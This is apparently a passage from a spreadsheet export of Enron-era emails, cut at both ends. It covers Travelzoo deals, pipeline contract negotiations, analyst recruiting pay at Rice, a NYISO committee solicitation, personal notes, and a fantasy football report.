 You can now add one (or multiple) e-mail and  text-page addresses easily in order to get Alerts from the Traffic  Report.  Simply click on the link that says "My Account" at the top  right-hand corner of any Traffic Report screen and look for the link just to  the right of the E-mail * input field that says Enter additional  e-mails.  Go to the Add an E-mail Contact link at the bottom of the next  screen. _x000D_
_x000D_
We hope you enjoy and find useful the new version of  the Traffic Report.  Please stay tuned for more exciting additions in the  near future. _x000D_
Sincerely, _x000D_
Bill Townsend _x000D_
President _x000D_
FriedWire Inc.  _x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Wed, 20 Mar 2002 07:33:21 -0800 (PST)</t>
  </si>
  <si>
    <t>Travelzoo Weekly Top 20_x000D_
Visit http://www.travelzoo.com/top20 for a free subscription._x000D_
_x000D_
Every week we search 200+ companies for their very best_x000D_
sales and compile this Top 20 list._x000D_
_x000D_
Thank you for subscribing. Please forward this to a friend!_x000D_
_x000D_
************************************************************_x000D_
TOP 20 DEALS -- MARCH 20, 2002_x000D_
************************************************************_x000D_
_x000D_
$59 -- "Friends Fly FREE" Promotion, Select Routes, Each Way_x000D_
http://www.travelzoo.com/Top20.asp?id=10067832_x000D_
Source: Southwest Airlines_x000D_
_x000D_
$104 -- Fly Coast-to-Coast in Leather Seats, Live TV_x000D_
http://www.travelzoo.com/Top20.asp?id=10067833_x000D_
Source: JetBlue Airways_x000D_
_x000D_
$199 -- Virginia Golf Package, 4-Diamond Resort_x000D_
http://www.travelzoo.com/Top20.asp?id=10067754_x000D_
Source: Marriott Hotels_x000D_
_x000D_
$409 -- Hawaii Package, 5 Nights Hotel + R/T Air_x000D_
http://www.travelzoo.com/Top20.asp?id=10067737_x000D_
Source: Pleasant Holidays_x000D_
_x000D_
$145 and up -- London on Sale, Each Way from 15+ Cities_x000D_
http://www.travelzoo.com/Top20.asp?id=10067744_x000D_
Source: British Airways_x000D_
_x000D_
$89 -- Indianapolis to 5 West Coast Cities_x000D_
http://www.travelzoo.com/Top20.asp?id=10067741_x000D_
Source: Frontier Airlines_x000D_
_x000D_
$98 -- Orlando, R/T from Boston_x000D_
http://www.travelzoo.com/Top20.asp?id=10067846_x000D_
Source: Travelocity.com_x000D_
_x000D_
$529 -- Paris, 4 Nights Hotel, R/T from the West Coast_x000D_
http://www.travelzoo.com/Top20.asp?id=10067752_x000D_
Source: France Vacations_x000D_
_x000D_
$369 -- Cruise to Belize, 5 Nights_x000D_
http://www.travelzoo.com/Top20.asp?id=10067808_x000D_
Source: Uniglobe.com_x000D_
_x000D_
$62 -- Stay in South Beach, Miami, April/May Special_x000D_
http://www.travelzoo.com/Top20.asp?id=10067813_x000D_
Source: Hotelster.com_x000D_
_x000D_
$39 -- 2 Nights at Circus Circus Las Vegas, Per Person_x000D_
http://www.travelzoo.com/Top20.asp?id=10067758_x000D_
Source: Online Vacation Mall_x000D_
_x000D_
$159 -- New York, Easter Weekend at Luxurious &amp;quot;W&amp;quot; Hotel_x000D_
http://www.travelzoo.com/Top20.asp?id=10067836_x000D_
Source: Expedia.com_x000D_
_x000D_
$22 -- Last Minute Car Deals in Texas, Seattle, Portland_x000D_
http://www.travelzoo.com/Top20.asp?id=10067834_x000D_
Source: Hertz_x000D_
_x000D_
$53 -- Aston Coconut Plaza Hotel, In the Heart of Waikiki_x000D_
http://www.travelzoo.com/Top20.asp?id=10067763_x000D_
Source: Aston Hotels &amp; Resorts_x000D_
_x000D_
$198 -- Fort Lauderdale, R/T from 14 Western Cities_x000D_
http://www.travelzoo.com/Top20.asp?id=10067831_x000D_
Source: America West Airlines_x000D_
_x000D_
$35.99 -- Reno, 2 Nights for Two at Atlantis Casino Resort_x000D_
http://www.travelzoo.com/Top20.asp?id=10067824_x000D_
Source: Atlantis Resort &amp; Casino_x000D_
_x000D_
$99 -- Cruise to Canada from San Francisco, 2 Nights_x000D_
http://www.travelzoo.com/Top20.asp?id=10067755_x000D_
Source: AskAboutCruises.com_x000D_
_x000D_
$29 -- Orlando, Per Night, FREE Shuttle to Disney_x000D_
http://www.travelzoo.com/Top20.asp?id=10067761_x000D_
Source: Avista Hotels_x000D_
_x000D_
$99 -- Sacramento (CA), R/T from Seattle, Last-Minute_x000D_
http://www.travelzoo.com/Top20.asp?id=10067845_x000D_
Source: Alaska Airlines_x000D_
_x000D_
$729 -- Mediterranean Cruise, Spain, Italy, France, 7 Days_x000D_
http://www.travelzoo.com/Top20.asp?id=10067767_x000D_
Source: Sears Vacations_x000D_
_x000D_
_x000D_
_x000D_
Do you have a deal we should consider for our next Top 20_x000D_
list?  Fax it to Carol at 650-943-2433._x000D_
_x000D_
---_x000D_
Please read the following terms and conditions of use_x000D_
carefully.  By using this newsletter, you agree to the_x000D_
following terms and conditions:_x000D_
_x000D_
Sales and promotions listed in this e-mail may contain_x000D_
restrictions and are subject to change.  For complete_x000D_
details, please contact the travel supplier.  Fares often do_x000D_
not include taxes or fees.  Sales and promotions listed in_x000D_
this e-mail are offered and provided by the respective_x000D_
travel supplier and/or its agents, not Travelzoo Inc._x000D_
Unauthorized distribution or commercial use of this e-mail_x000D_
is strictly prohibited.  Travelzoo Inc. does not_x000D_
independently verify the accuracy of this information and_x000D_
does not guarantee its accuracy or completeness.  Sales and_x000D_
promotions listed in this newsletter may have expired, may_x000D_
have changed, or may not be available anymore at the time_x000D_
you receive the newsletter.  The information provided in_x000D_
this e-mail may include inaccuracies and typographical_x000D_
errors.  Travelzoo Inc., its subsidiaries and affiliates_x000D_
are not liable for any claims of damages, loss or injury to_x000D_
persons or property arising out of this newsletter._x000D_
_x000D_
Copyright (c) 2002 Travelzoo Inc.  All Rights Reserved._x000D_
"Travelzoo," "Travelzoo Top 20," and "Top 20 Deals" are_x000D_
trademarks of Travelzoo Inc.  Other companies, products, or_x000D_
service names may be trademarks or service marks of others_x000D_
and are referenced for informational purposes only._x000D_
_x000D_
---_x000D_
To unsubscribe, please visit the edit profile page at_x000D_
http://www.travelzoo.com/profiles_x000D_
_x000D_
This email was sent to sscott5@enron.com_x000D_
_x000D_
This is a post-only e-mail.  Please do not reply.</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 00:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ron.coker@enron.com'})</t>
  </si>
  <si>
    <t>Re: Pastoria PSA</t>
  </si>
  <si>
    <t xml:space="preserve">Credit assurances will need to be provided at the time the firm _x000D_
transportation documents are signed. The PA states that Kern will tender the  _x000D_
transport agreement no later than 30 days prior to the date Kern files their _x000D_
FERC application.  Shippers will then have 15 days to sign the document . _x000D_
Kern will want to file this application ASAP - sometime in April._x000D_
_x000D_
I notice that the language below does not  address our need to have a call on _x000D_
the capacity if the sale falls through.  Due to the high level of exposure _x000D_
surrounding this capacity, I don't  think the language set forth below deals _x000D_
with all of the issues. _x000D_
_x000D_
I have a 9:30 meeting with Gerald to prepare the assignment documents - can _x000D_
we conference then?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ron Coker_x000D_
03/07/2001 07:17 PM_x000D_
To: Stephanie Miller/Corp/Enron@ENRON, Barry Tycholiz/NA/Enron@ENRON, Gerald _x000D_
Nemec/HOU/ECT@ECT_x000D_
cc: Karen E Jones/HOU/ECT@ECT, Andrew Kelemen/HOU/ECT@ECT _x000D_
_x000D_
Subject: Pastoria PSA_x000D_
_x000D_
Here's the PSA language.  Sorry._x000D_
_x000D_
_x000D_
(a)   Buyer agrees to obtain the release of Seller under Seller's guarantee, _x000D_
dated [_____], in favor of Kern River Gas Transmission Company effective as _x000D_
of the Closing, and in furtherance thereof, agrees that Buyer shall either _x000D_
provide its own guarantee in favor of Kern River Gas Transmission Company or _x000D_
such other form of security as shall be acceptable to Kern River Gas _x000D_
Transmission Company in order to obtain such release._x000D_
_x000D_
----- Forwarded by Ron Coker/Corp/Enron on 03/07/2001 07:16 PM -----_x000D_
_x000D_
	Ron Coker_x000D_
	03/07/2001 07:16 PM_x000D_
		 _x000D_
		 To: Stephanie Miller/Corp/Enron@ENRON, Barry Tycholiz/NA/Enron@ENRON, Gerald _x000D_
Nemec/HOU/ECT@ECT_x000D_
		 cc: Karen E Jones/HOU/ECT@ECT, Andrew Kelemen/HOU/ECT@ECT_x000D_
		 Subject: Pastoria PSA_x000D_
_x000D_
Below is the covenant we have in the PSA regarding release of the gas credit _x000D_
support.  When will a shipper be required to put up the credit support?  _x000D_
Would anticipate we would have trouble obtaining a written release from Kern _x000D_
if Calpine agreed to provide the required support?  Would we receive a _x000D_
written release if Enron puts up a guarantee (which by definition covers the _x000D_
entire 15-year term) and Calpine puts up a three year evegreen LC?  Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 09:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Insight Info Presentation in Oct.</t>
  </si>
  <si>
    <t>Thanks for the feed back - it may not have been the same Greg Johnston (she _x000D_
said that her Greg had an "e" at the end of his name)</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 06:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alejandro.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>Rice Recruiting: Analyst Compensation Comparables</t>
  </si>
  <si>
    <t xml:space="preserve">Steve -_x000D_
_x000D_
As you requested, attached please find the Analyst compensation comparables _x000D_
we discussed last week:_x000D_
_x000D_
_x000D_
_x000D_
We are having an extremely tough time recruiting Analysts from Rice because _x000D_
our main competition on campus comes from consulting companies (Bain, _x000D_
McKinsey, BCG, EY, Andersen, etc.) and investment banks (Goldman, JP Morgan, _x000D_
CSFB, Merrill Lynch, etc.).  Even though these companies are not directly in _x000D_
our industry group, they are our principal competitors for talent at Rice.  _x000D_
_x000D_
As evidenced by our recruiting performance this year and in previous years, _x000D_
we loose nearly every time when we compete with these companies.    In the _x000D_
last three years of recruiting at Rice, only 1 or 2 people have accepted our _x000D_
offer.  The other Analysts who are rice alumni (myself included) joined Enron _x000D_
through other circumstances._x000D_
_x000D_
I think our poor performance at Rice is due primarily to the following _x000D_
factors:_x000D_
_x000D_
Compensation:  The Enron compensation package  is below that of our _x000D_
competitors at Rice.  Additionally, there is more risk associated with our _x000D_
offer, since Enron's compensation structure relies more heavily on the year _x000D_
end bonus than some of our competitors.  In the cases where the package is _x000D_
similar (ie, McKinsey), we loose folks because of other company's name and _x000D_
prestige._x000D_
Rotations:  Most investment banks give their analysts offers to work in _x000D_
specific groups (M&amp;A, Trading, Etc.).  Our analyst recruits can express a _x000D_
preference, but their placement is not guaranteed.    This also creates an _x000D_
added element of risk and uncertainty._x000D_
_x000D_
In sum, I think we will continue to be unsuccessful in our recruiting efforts _x000D_
at Rice if we do not address these issues._x000D_
_x000D_
Should you need any further information, please feel free to contact me._x000D_
_x000D_
Regards,_x000D_
_x000D_
Alex Hernandez_x000D_
ENA - Principal Investments_x000D_
713-345-4059_x000D_
_x000D_
---------------------- Forwarded by Alejandro Hernandez/NA/Enron on _x000D_
12/15/2000 03:31 PM ---------------------------_x000D_
_x000D_
_x000D_
Alejandro Hernandez_x000D_
12/15/2000 03:30 PM_x000D_
To: Charlene Jackson/Corp/Enron@ENRON, Julie Braly/NA/Enron@ENRON, Jana _x000D_
Giovannini/HOU/ECT@ECT, Shelly Butler/HOU/ECT@ECT_x000D_
cc: Brian Hoskins/Enron Communications@Enron Communications, David _x000D_
Hunker/ENRON@enronxgate, Priya Jaisinghani/NA/Enron@Enron, Carrie _x000D_
Southard/LON/ECT@ECT, Erin A Rice/LON/ECT@ECT, Julie Davidson/HOU/EES@EES _x000D_
_x000D_
Subject: Analyst Compensation Comparables_x000D_
_x000D_
_x000D_
_x000D_
Charlene -_x000D_
_x000D_
As we discussed yesterday, attached please find a comparable compensation _x000D_
analysis for this year's Analyst offers:_x000D_
_x000D_
_x000D_
_x000D_
We believe that the low acceptance rate ( 14/112 ) we are experiencing this _x000D_
year is due to the following reasons:_x000D_
_x000D_
Enron's base salary is significantly below that of our competitors_x000D_
The bonus ranges were not mentioned in the offer letters_x000D_
_x000D_
I hope this information is useful to you as we continue our efforts to _x000D_
attract quality employees to Enron._x000D_
_x000D_
Should you have any questions, please feel free to contact me._x000D_
_x000D_
Regards,_x000D_
_x000D_
Alex Hernandez_x000D_
Analyst Advisory Board_x000D_
x54059_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 09:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Small Ventures USA, LLC</t>
  </si>
  <si>
    <t>For ALL options for this party, we need to revise the opening sentence to _x000D_
read:_x000D_
_x000D_
"... the terms and conditions of the Transaction ... on the Trade Date _x000D_
specified below (the "Transaction") which is an option offered by Small _x000D_
Ventures USA, LLC to ENA, and accepted by ENA, pursuant to a telephone _x000D_
conversation between the parties."</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 00:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'zach.moring@enron.com'})</t>
  </si>
  <si>
    <t>Kudos to Enron!</t>
  </si>
  <si>
    <t>Hi Mr. Lay,_x000D_
_x000D_
They told us in orientation that it was okay to send you an e-mail, so I hope _x000D_
I am not rocking the boat here! I just wanted to say that I am proud to be _x000D_
working for Enron and Net Works!_x000D_
_x000D_
From a book review on Amazon.com..._x000D_
_x000D_
_x000D_
"According to Gary Hamel, the professor-turned-strategy-guru author of _x000D_
Leading the Revolution, complacent establishment giants and one-strategy _x000D_
start-ups are on the same side of the fence--the wrong side. He blows apart _x000D_
the popular myth that innovation lies solely in the hands of dot.com dynamos _x000D_
like AOL and Amazon by scrutinizing the examples of such "gray-haired _x000D_
revolutionaries" as Enron and Charles Schwab, companies that have managed to _x000D_
reinvent both themselves and their entire industries, time and again."_x000D_
_x000D_
Regards,_x000D_
_x000D_
Zach Moring_x000D_
Team Lead - Strategic Communications_x000D_
Ext. 3-3253</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 12:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mryantaber@nyiso.com'})</t>
  </si>
  <si>
    <t>Solicitation for the position of Vice-Chairperson of the NYISO_x000D_
 Operating Committee</t>
  </si>
  <si>
    <t>_x000D_
MRyanTaber@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
Solicitation of Credentials from Candidates_x000D_
   for the position of Vice-Chairperson of the NYISO Operating Committee_x000D_
          for a one-year term from December 2001 ? November 2002_x000D_
_x000D_
     The Nominating Committee of the NYISO Operating Committee is seeking_x000D_
qualified individuals willing to serve as Vice-Chairperson of the_x000D_
Committee._x000D_
     The scope of responsibilities of the Operating Committee can be found_x000D_
in Article 8 of the ISO Agreement.  As specified in the Agreement, the_x000D_
Chairperson and Vice-Chairperson will serve a one-year term, and the_x000D_
Vice-Chairperson will become the Chairperson following the completion of_x000D_
the Chairperson's term.  The Agreement further specifies that the_x000D_
individuals elected to these positions may not be active in the same sector_x000D_
as the Chair of their Committee, nor may they be representatives of members_x000D_
that occupy the Chairperson or Vice Chairperson positions of the Business_x000D_
Issues Committee or Management Committee._x000D_
     These provisions, at this time, preclude representatives of the_x000D_
following companies or their affiliates and representatives from the_x000D_
following sector from consideration for Vice-Chairperson for the upcoming_x000D_
term:_x000D_
?    Transmission Owners_x000D_
?    Niagara Mohawk_x000D_
?    Con Ed Solutions_x000D_
?    New York Power Authority_x000D_
_x000D_
     The Nominating Committee will review the credentials of the presenting_x000D_
candidates and may screen the pool.  However, the Nominating Committee is_x000D_
required (pursuant to the OC By-Laws) to bring at least  one qualified_x000D_
candidate before the Operating Committee for election._x000D_
     Therefore, the Nominating Committee requests that interested_x000D_
individuals, who are not representatives of the members or sectors listed_x000D_
above, to present the following material by 5:00 pm, October 4, 2001._x000D_
_x000D_
?    A current resume_x000D_
?    Brief answers to the following questions:_x000D_
1.   Please describe all experience you have had in chairing groups or_x000D_
committees of diverse interests, with a list of such groups._x000D_
2.   Please describe the support of your organization for your assuming the_x000D_
position of Vice-Chairperson, and describe your ability to make the_x000D_
necessary time commitment._x000D_
3.   Please describe any training or experience you have had in mediation,_x000D_
ADR or consensus building._x000D_
4.   Please describe briefly why you would like to have this job._x000D_
5.   Please describe briefly your organizations actual and/or potential_x000D_
business interests in the Northeast and New York State, including the_x000D_
sector in which your organization participates for purposes of NYISO_x000D_
governance._x000D_
_x000D_
Please send this information by electronic mail to:_x000D_
     Mollie Lampi, NYISO, (tel) 518-356-7530, (e-mail) mlampi@nyiso.com and_x000D_
     Ernie Cardone,  NYISO, (tel) 518 ? 356- 6133, (email)_x000D_
ecardone@nyiso.com</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 07:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'webb.david@epenergy.com'})</t>
  </si>
  <si>
    <t>FW: Sample Ballot In West Palm Beach</t>
  </si>
  <si>
    <t>&gt; Subject: FW: Sample Ballot In West Palm Beach_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    &lt;&lt;BallotWPBF11_.doc&gt;&gt;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_x000D_
_x000D_
 - BallotWPBF11_.doc</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 08:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'s.nadalin@thehiringspot.com'})</t>
  </si>
  <si>
    <t>Re: new years</t>
  </si>
  <si>
    <t xml:space="preserve">don't know what doing for new years (mentioned n.o. to z but not sure).  _x000D_
didn't return phone call because i was in nyc and forgot when i got home.  i _x000D_
don't know anything about directories talk to my brother.  i don't know what _x000D_
the fuck._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Steve Nadalin" &lt;s.nadalin@thehiringspot.com&gt; on 12/08/2000 04:28:15 PM_x000D_
Please respond to &lt;s.nadalin@thehiringspot.com&gt;_x000D_
To: "Martin Cuilla (E-mail)" &lt;mcuilla@ect.enron.com&gt;_x000D_
cc:  _x000D_
Subject: new years_x000D_
_x000D_
_x000D_
what the fuck are you doing for new years? why the fuck didn't you return my_x000D_
voice-mail? where in the fuck are those directories? what the fuck, man?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Sep 2001 08:36:47 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dks@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>frozenset({'sgreenberg@realenergy.com', 'aa_goett@pacbell.net', 'nahigian@enron.com', 'jfagan@xenergy.com', 'rsperberg@onsitesycom.com', 'zimmerman@enron.com', 'dick@davis.com', 'tomlong@cts.com', 'clower@earthlink.net', 'bernstein@enron.com', 'lower@enron.com', 'jeff@jbsenergy.com', 'goett@enron.com', 'szimmer2@enron.com', 'long@enron.com', 'counihan@greenmountain.com', 'ckmitchell@powernet.net', 'mitchell@enron.com', 'ctrotter@pacbell.net', 'sperberg@enron.com', 'pprice@quiknet.com', 'greenberg@enron.com', 'dasovich@enron.com', 'jdasovic@enron.com', 'trotter@enron.com', 'lwhouse@el-dorado.ca.us', 'counihan@enron.com', 'price@enron.com', 'house@enron.com', 'dviolette@summitblue.com', 'markb@rand.org', 'fagan@enron.com', 'violette@enron.com', 'ely@enron.com'})</t>
  </si>
  <si>
    <t>FW: GV and restructuring</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Schultz, Don  _x000D_
Sent:   Thursday, September 13, 2001 8:36 AM _x000D_
To:     Boyd,Kelly; Brown,Jeff; Chinn,Randy; Clark,Woody; Ferrera, Anna; Kelly,Brian; Lingbloom, Lawrence; Lipper,Kip; Lyons, Joseph; Phillips,Guy; Sherriff,Rona; Symonds,Toni; Zeps,Gabrielle_x000D_
_x000D_
Cc:     Bondonno,Maria; Campbell,Rod; Hartmann,Audra; Julian, Bill _x000D_
Subject:        GV and restructuring _x000D_
_x000D_
&lt;&lt;grid vulnerabilities_blackouts and blackout avoidance_Sept 8-13_2001.doc&gt;&gt; &lt;&lt;restructuring__CA experience revisited_Sept part 2.doc&gt;&gt; </t>
  </si>
  <si>
    <t>Wed, 3 May 2000 01:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: COORD ADMIN</t>
  </si>
  <si>
    <t xml:space="preserve">Do you happen to know Gretchen Jennings?  How long do you suggest I wait to_x000D_
call her?  I don't believe in waiting too long._x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Tana.Jones@enron.com&gt;_x000D_
To: &lt;pyoung@pdq.net&gt;_x000D_
Sent: Tuesday, May 02, 2000 1:23 PM_x000D_
Subject: Re: COORD ADMIN_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; You are the one!  I hope everything works out, keep me posted and let me_x000D_
&gt; know if there's anything I can do to help!_x000D_
&gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 16:04:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Western Frontier</t>
  </si>
  <si>
    <t xml:space="preserve">Mark--_x000D_
_x000D_
Thx for copying me on this..........yea, what's Entergy doing?  And Marathon stepping out...._x000D_
_x000D_
Talk to you tomorrow._x000D_
_x000D_
D_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Whitt, Mark  _x000D_
Sent:	Thursday, October 25, 2001 4:54 PM_x000D_
To:	Miller, Stephanie; Polsky, Phil; Tycholiz, Barry_x000D_
Cc:	Bump, Dan J.; Lucci, Paul T.; Miller, Paul; Reitmeyer, Jay; Harrison, Tyrell_x000D_
Subject:	RE: Western Frontier_x000D_
_x000D_
Are they going to build it if it is not fully subscribed?  Or is Williams going to take the risk?  I wonder why Entergy is taking space?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Polsky, Phil  _x000D_
Sent:	Thursday, October 25, 2001 3:07 PM_x000D_
To:	Whitt, Mark_x000D_
Subject:	FW: Western Frontier_x000D_
_x000D_
Mark,_x000D_
_x000D_
Steph said you were looking for some info on the Western Frontier project that was in NGI today.  I called the contact person at Western Frontier/Williams and he told me that the project was not in fact fully subscribed.  He was obviously interested in speaking with you again.  _x000D_
_x000D_
I glanced through their filing, and apparently the open season led to PAs for 365,000 Dth/d of the 540,000 Dth/d of available capacity.  PAs have been signed with the following:_x000D_
_x000D_
Marathon - 75,000 dth/d_x000D_
Williams Marketing - 200,000 dth/d_x000D_
Utilicorp United - 15,000 dth/d_x000D_
Entergy - 75,000 dth/d_x000D_
_x000D_
With the exception of Marathon, everyone signed up for ten years.  Marathon committed to five years, with an option to extend for two years.  _x000D_
_x000D_
Let me know if you need anything else._x000D_
_x000D_
Phil_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Sanders, Dale T." &lt;Dale.T.Sanders@Williams.com&gt;@ENRON  _x000D_
Sent:	Thursday, October 25, 2001 2:27 PM_x000D_
To:	Polsky, Phil_x000D_
Subject:	Western Frontier_x000D_
_x000D_
_x000D_
Phil, _x000D_
Here is the information that you requested.  If I can be of any other assistance, please do not hesitate to call. _x000D_
 &lt;&lt;Electronic Version for e-mail.doc&gt;&gt;  &lt;&lt;WFSYSMAP_1.jpg&gt;&gt;  &lt;&lt;WFSYSMAP_1.pdf&gt;&gt;  &lt;&lt;WFrontierfiling.dot&gt;&gt; _x000D_
Dale T. Sanders _x000D_
Williams Gas Pipeline-SouthCentral/ Western Frontier _x000D_
Project Manager-Business Development _x000D_
Phone:   270-688-6944 _x000D_
Fax:      270-688-6320_x000D_
)  e-mail:   &lt;mailto:dale.t.sanders@williams.com &lt;&lt; File: Electronic Version for e-mail.doc &gt;&gt;  _x000D_
_x000D_
_x000D_
 - Electronic Version for e-mail.doc &lt;&lt; File: WFSYSMAP_1.jpg &gt;&gt; _x000D_
 - WFSYSMAP_1.jpg &lt;&lt; File: WFSYSMAP_1.pdf &gt;&gt; _x000D_
 - WFSYSMAP_1.pdf &lt;&lt; File: WFrontierfiling.dot &gt;&gt; _x000D_
 - WFrontierfiling.dot </t>
  </si>
  <si>
    <t>Wed, 27 Dec 2000 00:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Documents</t>
  </si>
  <si>
    <t xml:space="preserve">I have the docs and will forward them to you._x000D_
_x000D_
Mark_x000D_
----- Forwarded by Mark Whitt/NA/Enron on 12/27/2000 08:20 AM -----_x000D_
_x000D_
	"Brian Stone" &lt;htebs@huber.com&gt;_x000D_
	12/22/2000 07:06 AM_x000D_
		 _x000D_
		 To: &lt;Gerald.Nemec@enron.com&gt;, &lt;mark.Whitt@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Documents_x000D_
_x000D_
Mark,_x000D_
You should now have all Huber executed documents:_x000D_
- Capacity Release_x000D_
- Transaction Agreement (amended) covering Trailblazer_x000D_
- Transaction Agreement (amended) covering CIG_x000D_
- Assignment - Trailblazer_x000D_
- Assignment - CIG_x000D_
_x000D_
Let me know if you have not received any of the above.  Once executed_x000D_
by Enron, please return one original of each to my attention._x000D_
_x000D_
Thanks, and happy holidays._x000D_
Brian Stone_x000D_
</t>
  </si>
  <si>
    <t>Sat, 29 Dec 2001 06:20:02 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for UHFFL 12/29/01</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
[IMAGE] =09_x000D_
 Attention Fantasy Members! It's time to get an early start on that New Yea=_x000D_
r's resolution. MVP.com is offering FREE Standard Shipping in our Fitness S=_x000D_
hop until 1/17/02. Click here to see what we have to offer.   Save $.05 a g=_x000D_
allon on the gas that keeps your car's engine clean. Click here  to apply o=_x000D_
nline.  Win  a VIP Vegas Vacation! OR Win  $600 CASH!   Brought to you by  =_x000D_
 Sponsorship Bar You are receiving these e-reports because you have signed =_x000D_
up for CBS SportsLine.com Fantasy Football.  To customize, reschedule, or t=_x000D_
urn off these reports please  click here    NFL Reports, Player Updates  [I=_x000D_
MAGE]Latest NFL Player News  Martin Gramatica , K TB - The Leather Cheerios=_x000D_
 Updated 12/28/01 Gramatica has still not been ruled out for Saturday's gam=_x000D_
e, although the Buccaneers have signed veteran kicker Doug Brien as insuran=_x000D_
ce. Even if Gramatica can play, he will be a very risky Fantasy starter.   =_x000D_
Warrick Dunn , RB TB - Third World Countryman Updated 12/28/01 Dunn's statu=_x000D_
s is day to day with a toe injury. He is expected to play this week, but Mi=_x000D_
le Alstott has been the most productive back on the team in recent weeks.  =_x000D_
 Michael Westbrook , WR WAS - Third World Countryman Updated 12/28/01 Westb=_x000D_
rook's status is day to day with a knee injury. He is expected to play this=_x000D_
 week.   MarTay Jenkins , WR ARI - Free Agent Updated 12/28/01 Jenkins may =_x000D_
miss his second consecutive game with an ankle injury this week. Arnold Jac=_x000D_
kson would replace him as Arizona's third receiver.   Brian Finneran , WR A=_x000D_
TL - Free Agent Updated 12/28/01 Finneran is listed as probable with a knee=_x000D_
 injury. He is expected to play this week.   Tyrone Davis , TE GB - Free Ag=_x000D_
ent Updated 12/28/01 Davis has been elevated to the No. 2 tight end slot ov=_x000D_
er rookie David Martin. He will see a considerable amount of playing time n=_x000D_
ow that he is healthy, because Green Bay employs many double tight end sets=_x000D_
 in the red zone.   Oronde Gadsden , WR MIA - She Said Updated 12/28/01 Gad=_x000D_
sden has been practicing this week and may be able to play. But his hamstri=_x000D_
ng injury may limit his productivity.   Steve McNair , QB TEN - She Said Up=_x000D_
dated 12/28/01 McNair was limited in practice on Thursday. He is still expe=_x000D_
cted to play this week, but he is a risky Fantasy starter because he will b=_x000D_
e less than 100 percent healthy.   Jimmy Smith , WR JAC - Pierres Flea Circ=_x000D_
us Updated 12/28/01 Smith (flu) has missed practice time this week. He is s=_x000D_
till expected to play.   Joe Horn , WR NO - The Leather Cheerios Updated 12=_x000D_
/28/01 Horn suffered a minor shoulder injury in practice on Thursday. He is=_x000D_
 expected to start this week.   Aaron Shea , TE CLE - Free Agent Updated 12=_x000D_
/28/01 Shea (shoulder) has been placed on injured reserve. O.J. Santiago wi=_x000D_
ll continue to be Cleveland's No. 1 tight end while he is out.   Jason Broo=_x000D_
kins , RB BAL - The Wounded Ducks Updated 12/28/01 Brookins has returned to=_x000D_
 practice and is listed as probable. But he still may not see any game acti=_x000D_
on until Week 17.  Emmitt Smith , RB DAL - Pierres Flea Circus Updated 12/2=_x000D_
8/01 Micahel Wiley may miss this week's game with a hip injury. Smith is ex=_x000D_
pected to appear on third downs this week as well as assuming his normal wo=_x000D_
rkload.   James Thrash , WR PHI - Pumpdog Updated 12/28/01 Thrash (ankle) r=_x000D_
eturned to practice on Thursday. he is expected to play this week.   Wesley=_x000D_
 Walls , TE CAR - Cali Bound Updated 12/28/01 Walls missed practice on Thur=_x000D_
sday with a knee injury. He may be a gametime decision this week.   Maurice=_x000D_
 Smith , RB ATL - Xtreme Updated 12/28/01 A banged-up Smith Toe/knee)  will=_x000D_
 continue to start for the Falcons. But Dan Reeves has indicated Rodney Tho=_x000D_
mas will continue to get some work at halfback.   Bob Christian , RB ATL - =_x000D_
Free Agent Updated 12/28/01 Christian is day to day with a calf injury. He =_x000D_
is expected to play this week.   Stephen Davis , RB WAS - 2700 HUEVOS Updat=_x000D_
ed 12/28/01 Davis (knee) has returned to practice. He is expected to start =_x000D_
this week.   Todd Bouman , QB MIN - Pumpdog Updated 12/28/01 Bouman took a =_x000D_
few snaps Thursday but didn't appear to meet coach Dennis Green's "full str=_x000D_
ength" criteria for starting against Green Bay.   Spergon Wynn is likely to=_x000D_
 start Sunday, though coaches didn't discuss the issue after Thursday's pra=_x000D_
ctice. Bouman didn't participate in the team's morning walk-through, when p=_x000D_
layers work on plays without fully suiting up. And during the portion of th=_x000D_
e regular practice that reporters were allowed to watch, Wynn took more sna=_x000D_
ps than Bouman. A trainer said Wynn continued to take more snaps later in t=_x000D_
